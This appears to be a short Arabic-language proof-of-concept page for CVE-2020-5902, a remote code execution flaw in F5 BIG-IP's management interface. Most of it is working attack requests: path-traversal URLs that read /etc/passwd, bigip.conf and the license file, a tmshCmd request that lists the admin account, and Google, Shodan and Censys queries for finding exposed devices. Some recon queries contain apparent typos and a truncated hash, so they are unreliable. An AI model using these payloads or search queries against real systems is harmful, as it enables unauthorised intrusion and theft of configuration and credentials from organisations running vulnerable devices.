
إثبات مفهوم لاستغلال CVE-2020-5902، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في F5 BIG-IP TMUI، مع حمولات قراءة ملفات وتنفيذ أوامر واستعلامات استطلاع لـ Shodan و Censys.
في إصدارات BIG-IP 15.0.0-15.1.0.3، 14.1.0-14.1.2.5، 13.1.0-13.1.3.3، 12.1.0-12.1.5.1، و 11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، التي يُشار إليها أيضًا باسم أداة التكوين، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse
inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"
~~ جرب استخدام الاستعلامات التالية لـ Shodan:
1. F5-login-pages
2. www-authenticate: Basic realm:BIG-IP
3. BigIP / BIG-IP
4. htt.favicon.hash:-335242539
5. http.title:"BIG-IP&req:- Redirect"
~~ جرب استخدام الاستعلامات التالية لـ Censys:
1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
2.433.https.get.title:"BIG-IP&req:- Redirect"
##مرحبًا##
i'm Rizki Ardian
how are you today??